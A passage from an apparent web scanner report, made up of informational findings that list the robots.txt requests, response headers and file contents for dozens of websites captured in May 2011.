ETag: "2a-46b56d282f580"
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow: /goto.php

30.391. http://www.softlist.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlist.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softlist.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:04 GMT
Server: Apache
Last-Modified: Wed, 26 Dec 2007 11:45:27 GMT
Accept-Ranges: bytes
Content-Length: 79
Cache-Control: max-age=15552000
Expires: Sat, 29 Oct 2011 00:29:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /visit.php
Disallow: /buy.php
Disallow: /get.php

30.392. http://www.songs-lyrics.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songs-lyrics.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.songs-lyrics.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:36 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 30 Sep 2009 18:20:44 GMT
ETag: "194009-17-474cf96ce5700"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

30.393. http://www.spirit-of-metal.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spirit-of-metal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.spirit-of-metal.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8o
Last-Modified: Sun, 02 Jan 2011 11:25:59 GMT
ETag: "5adae-6e-498db4cb47fc0"
Accept-Ranges: bytes
Content-Length: 110
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /membre/

User-agent: *
Disallow: /soumission/

User-agent: *
Disallow: /forum/membre/

30.394. http://www.stoik.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stoik.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stoik.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:54 GMT
Server: Apache
Last-Modified: Sat, 12 Mar 2011 16:05:43 GMT
ETag: "6eec727-a9-49e4b4028e3c0"
Accept-Ranges: bytes
Content-Length: 169
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /company/legal/
Disallow: /bitrix/
Disallow: /admin/
Disallow: /upload/
Disallow: /checkupdate/


Sitemap: http://www.stoik.com/sitemap_index.xml

30.395. http://www.studylight.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.studylight.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.studylight.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:43 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 28 Jul 2010 18:49:54 GMT
ETag: "4d914c5-2a2-48c7715591880"
Accept-Ranges: bytes
Content-Length: 674
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# robots.txt file for StudyLight.org
# last modified January 19, 2001
# jgarrison@studylight.org

User-agent: *
Crawl-Delay: 30

User-agent: NPBot
Disallow: /

User-agent: msnbot
Crawl-Delay: 60

# ba
...[SNIP]...

30.396. http://www.style-hair-magazine.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.style-hair-magazine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.style-hair-magazine.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:12 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.style-hair-magazine.com/I4rjKRsn.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /
...[SNIP]...

30.397. http://www.superhost.pl/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superhost.pl
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.superhost.pl

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:45 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Mon, 28 Mar 2011 13:39:24 GMT
ETag: "65570a-4a-1259fb00"
Accept-Ranges: bytes
Content-Length: 74
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /category/aktualnosci/
Disallow: /rekrutacja-da/


30.398. http://www.support.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.support.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.support.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:34 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 23:29:16 GMT
ETag: "1000000031881-6aa-4990da31423c0"
Accept-Ranges: bytes
Content-Length: 1706
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by
...[SNIP]...

30.399. http://www.sweepsadvantage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sweepsadvantage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sweepsadvantage.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=ISO-8859-1
Date: Mon, 02 May 2011 00:36:59 GMT
Content-Language: en-US
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-okpfkgjm=94F44E0EC01EB5E8C79939F604B1DA66; path=/
Last-Modified: Wed, 19 May 2010 13:11:44 GMT
Content-Length: 6371

User-agent: Mediapartners-Google
Disallow:

User-agent: TurnitinBot
Disallow: /

User-agent: Black Hole
Disallow: /

User-agent: Titan
Disallow: /

User-agent: WebStripper
Disallow: /

User-agent: Ne
...[SNIP]...

30.400. http://www.sythe.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sythe.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sythe.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:02:02 GMT
Server: nginx admin
Content-Type: text/plain; charset=UTF-8
Content-Length: 149
Last-Modified: Tue, 21 Sep 2010 06:00:57 GMT
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 00:02:02 GMT
Cache-Control: max-age=604800
X-Cache: HIT from Backend
Accept-Ranges: bytes
Connection: close

User-agent: *
Disallow: /cgi-bin/
Allow: /

User-agent: Googlebot
Allow: /
Disallow: /cgi-bin/

User-agent: MJ12bot
Disallow: /
Disallow: /cgi-bin/


30.401. http://www.tacklewarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tacklewarehouse.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:27 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Thu, 08 Jul 2010 21:17:24 GMT
Content-Length: 24
Content-Type: text/plain

User-agent: *
Disallow:

30.402. http://www.techonlife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techonlife.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techonlife.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:20 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "210629f-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

30.403. http://www.techtalkz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techtalkz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.techtalkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:21 GMT
Server: Apache
Last-Modified: Fri, 26 Mar 2010 20:58:04 GMT
ETag: "414d55-392-482ba6b62af00"
Accept-Ranges: bytes
Content-Length: 914
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.techtalkz.com/sitemap_index.xml.gz
Disallow: /cgi-bin/
Disallow: /ajax.php
Disallow: /attachment.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.p
...[SNIP]...

30.404. http://www.teensfilm.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.teensfilm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.teensfilm.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:10 GMT
Server: Apache
Last-Modified: Wed, 30 Sep 2009 13:44:40 GMT
ETag: "14c1045-33-4ac360c8"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /cgi-bin/
Disallow: /cgi/

30.405. http://www.tellmehowto.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tellmehowto.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tellmehowto.net

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:18 GMT
Server: Apache
Last-Modified: Wed, 09 May 2007 09:57:17 GMT
ETag: "ad3b1f05-37-8f2ef940"
Accept-Ranges: bytes
Content-Length: 55
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /askaquestion/
Disallow: /test/

30.406. http://www.tenniswarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tenniswarehouse.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:23 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 22 Feb 2006 13:23:20 GMT
Content-Length: 25
Content-Type: text/plain

User-agent: *
Disallow:

30.407. http://www.thaimisc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thaimisc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thaimisc.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:51 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.4
Last-Modified: Wed, 30 Jul 2008 08:17:08 GMT
ETag: "cd116a-a0-4533961ece900"
Accept-Ranges: bytes
Content-Length: 160
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /freewebboard/php/vreply.php?topic=4669&user=benjapol
Disallow: /freewebboard/php/vreply.php?user=freecdbuddha&topic=40&page=3
Allow: /

30.408. http://www.the-bikini.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-bikini.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-bikini.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:48:58 GMT
Server: Apache
Last-Modified: Thu, 10 Feb 2005 21:52:15 GMT
ETag: "12f66-17-31e9c1c0"
Accept-Ranges: bytes
Content-Length: 23
Cache-Control: max-age=-196217743
Expires: Thu, 10 Feb 2005 21:53:15 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.409. http://www.the-clitoris.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.the-clitoris.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.the-clitoris.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.16
Last-Modified: Thu, 14 Apr 2011 09:44:50 GMT
ETag: "a1800a-37d-4a0ddc6c72880"
Accept-Ranges: bytes
Content-Length: 893
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /bargraph/
Disallow: /buttons/
Disallow: /MSOffice/
Disallow: /_vti_bin/
Disallow: /n_html/_vti_cnf/
Disallow: /phpbb/


Disallow: /f_html/female_masturbati
...[SNIP]...

30.410. http://www.theday.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theday.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 24 Nov 2009 14:40:36 GMT
Accept-Ranges: bytes
ETag: "1e75416146dca1:0"
Server: Microsoft-IIS/7.0
Date: Sun, 01 May 2011 22:31:38 GMT
Content-Length: 324
Age: 5034
X-Cache: HIT from sxsquid04
X-Cache-Lookup: HIT from sxsquid04:80
Via: 1.0 sxsquid04 (squid/3.0.STABLE18)
Connection: close

User-agent: *
Allow: /
Disallow: /apps/pbcs.dll/error
Disallow: /apps/pbcs.dll/search
Disallow: /apps/pbcsi.dll
Disallow: /export
Disallow: /fileupload
Disallow: /NLCCEIMPORTS
Disallow: /misc
...[SNIP]...

30.411. http://www.thefactsaboutfitness.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefactsaboutfitness.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefactsaboutfitness.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:15:40 GMT
Server: Apache/1.3.42 (Unix) (Red-Hat/Linux) PHP/5.2.13 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8n-fips FrontPage/4.0.4.3
Last-Modified: Sun, 27 Feb 2011 23:32:12 GMT
ETag: "1cb-23-4d6adefc"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /

30.412. http://www.thefordstory.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefordstory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thefordstory.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.thefordstory.com/xmlrpc.php
Content-Length: 24
Content-Type: text/plain; charset=utf-8
Date: Sun, 01 May 2011 23:53:30 GMT
Connection: close

User-agent: *
Disallow:

30.413. http://www.thehothits.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehothits.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehothits.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:26:10 GMT
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.3
Last-Modified: Thu, 28 Apr 2011 00:15:50 GMT
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.414. http://www.thehunsearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehunsearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.thehunsearch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:20 GMT
Server: Apache
Last-Modified: Fri, 17 Sep 2010 11:09:31 GMT
ETag: "820005-32-4907298cbb0c0"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /go.php
Disallow: /out.php

30.415. http://www.theteachersguide.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theteachersguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.theteachersguide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:17:59 GMT
Server: Apache/1.3.27 (Unix) mod_perl/1.27 PHP/4.2.3 mod_fastcgi/2.2.12 FrontPage/5.0.2.2510 mod_jk/1.2.0 mod_ssl/2.8.11 OpenSSL/0.9.6g
Last-Modified: Sat, 16 Jan 2010 04:04:01 GMT
ETag: "9fd7e4-31-4b513ab1"
Accept-Ranges: bytes
Content-Length: 49
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:


30.416. http://www.ticketluck.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketluck.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ticketluck.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:20 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 301
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:05:20 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Sitemap: http://www.ticketluck.com/all_sitemaps.xml
Sitemap: http://www.ticketluck.com/uk/all_sitemaps.xml
Disallow: /images/
Disallow: /contents/
Disallow: /Images-For-cities/
Dis
...[SNIP]...

30.417. http://www.timezoneconverter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timezoneconverter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.timezoneconverter.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:50 GMT
Server: Apache
Last-Modified: Thu, 04 Feb 1999 12:40:20 GMT
ETag: "14401d-1fc-36b99534"
Accept-Ranges: bytes
Content-Length: 508
Connection: close
Content-Type: text/plain

# robots.txt for http://www.timezoneconverter.com
# contact: webmaster@timezoneconverter.com

User-agent: *
Disallow: /_borders/
Disallow: /_fpclass/
Disallow: /_private/
Disallow: /_vti_bin/
Disallow
...[SNIP]...

30.418. http://www.tomorrowsworld.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomorrowsworld.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tomorrowsworld.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:49:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 15 May 2011 23:49:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.419. http://www.top-10-list.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top-10-list.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.top-10-list.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
Expires: Sun, 24 Apr 2011 23:35:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 01 May 2011 23:35:56 GMT
Connection: close
Content-Type: text/plain

User-agent: Googlebot
Disallow: /wp-content/
Disallow: /trackback/
Disallow: /wp-admin/
Disallow: /index.php
Disallow: /*?
Disallow: /*.php$
Disallow: /*.js$
Disallow: /*.inc$
Disallow: /*.cs
...[SNIP]...

30.420. http://www.top21sites.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.top21sites.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.top21sites.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:30 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=173.193.214.243.1304297670854503; path=/; expires=Wed, 01-Jun-11 00:54:30 GMT
Last-Modified: Fri, 07 Jan 2011 02:21:57 GMT
ETag: "89bb12-208c-49938484bfb40"
Accept-Ranges: bytes
Content-Length: 8332
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8


# Robots.txt file from http://www.searchengineworld.com
#
# Built from text file http://info.webcrawler.com/mak/projects/robots/active/all.txt
#
# This restricts access to only known and registere
...[SNIP]...

30.421. http://www.toyotacertified.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toyotacertified.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.toyotacertified.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 22 Apr 2011 15:56:01 GMT
ETag: "7b813-dc-e4f6a640"
Accept-Ranges: bytes
Content-Length: 220
Content-Type: text/plain
Date: Sun, 01 May 2011 23:38:35 GMT
Connection: close

User-agent: *
Disallow: /bat/
Disallow: /css/
Disallow: /disclaimers/
Disallow: /help/
Disallow: /img/
Disallow: /includes/
Disallow: /js/
Disallow: /xml/
Disallow: /dealers/services/
Disall
...[SNIP]...

30.422. http://www.tqlkg.com/image-4989411-10732263

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tqlkg.com
Path:   /image-4989411-10732263

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tqlkg.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Mon, 25 Apr 2011 22:28:50 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Mon, 02 May 2011 02:19:12 GMT

# go away
User-agent: *
Disallow: /

30.423. http://www.tradingplaceamerica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingplaceamerica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tradingplaceamerica.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:39 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Tue, 07 Jul 2009 15:47:02 GMT
ETag: "8e84b2-16-4a536df6"
Accept-Ranges: bytes
Content-Length: 22
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

30.424. http://www.traditionalmusic.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.traditionalmusic.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.traditionalmusic.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:04:00 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 10:36:49 GMT
ETag: "bd500c1-194-48790f7c89240"
Accept-Ranges: bytes
Content-Length: 404
Connection: close
Content-Type: text/plain

#Traditional music

User-agent: Slurp
Crawl-delay: 10 0

User-agent: twiceler
Crawl-delay: 1 5

User-agent: Turnitinbot
Disallow: /

User-agent: turnitin
Disallow: /

User-agent: Mp3Bot
Disallow: /

U
...[SNIP]...

30.425. http://www.travel-library.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-library.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.travel-library.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 00:07:30 GMT
ETag: "21a8d67-2cf-493013200b480"
Accept-Ranges: bytes
Content-Length: 719
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: en-GB

User-agent: ShopWiki
Crawl-Delay: 5

User-agent: *
Disallow: /owner/
Disallow: /search.html
Disallow: /Log.html
Disallow: /HotelPhotoSubmission.html
Disallow: /ReviewHelfulSubmission.html
Disallow: /C
...[SNIP]...

30.426. http://www.trilulilu.ro/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trilulilu.ro
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trilulilu.ro

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:45:06 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 11:02:32 GMT
ETag: "18cd0d2-17-49df68c86c200"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

30.427. http://www.trincoll.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trincoll.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.trincoll.edu

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:20:57 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Thu, 10 Aug 2006 20:46:32 GMT
ETag: "fa800d-32-41aafec3f1a00"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/plain; charset=ISO-8859-1
Age: 873
X-Cache: HIT from cache4.cc.trincoll.edu
X-Cache-Lookup: HIT from cache4.cc.trincoll.edu:80
Connection: close

User-agent: *
Disallow: /zines/tj/
Disallow: /tj/

30.428. http://www.truzu.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truzu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.truzu.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Wed, 01 Dec 2010 12:24:56 GMT
ETag: "3f04d53-3a-49658649ad600"
Accept-Ranges: bytes
Content-Length: 58
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
Crawl-delay: 2
Request-rate: 1/2


30.429. http://www.tutorialized.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tutorialized.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tutorialized.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:50 GMT
Server: Apache
Last-Modified: Fri, 19 Feb 2010 21:57:56 GMT
ETag: "30e1df8-30-47ffb2d0a2100"
Accept-Ranges: bytes
Content-Length: 48
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /broken
Disallow: /rate

30.430. http://www.tva.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tva.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.tva.gov

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:36 GMT
Server: Apache
Last-Modified: Thu, 01 Jul 2010 20:06:28 GMT
ETag: "3acc87-d9-48a590174d960"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: text/plain
Set-Cookie: BIGipServerpublic_152.85.7.184.8061=1665160600.32031.0000; path=/
Expires: Tue, 03 May 2011 00:50:36 GMT
Connection: close

# Robots.txt file for http://www.tva.com
#

User-agent: *
Disallow: /theexchange/
Disallow: /customers/
Disallow: /environment/policy/
Disallow: /orgsRENAME
Disallow: /transition/
Disallow: /clips/
Di
...[SNIP]...

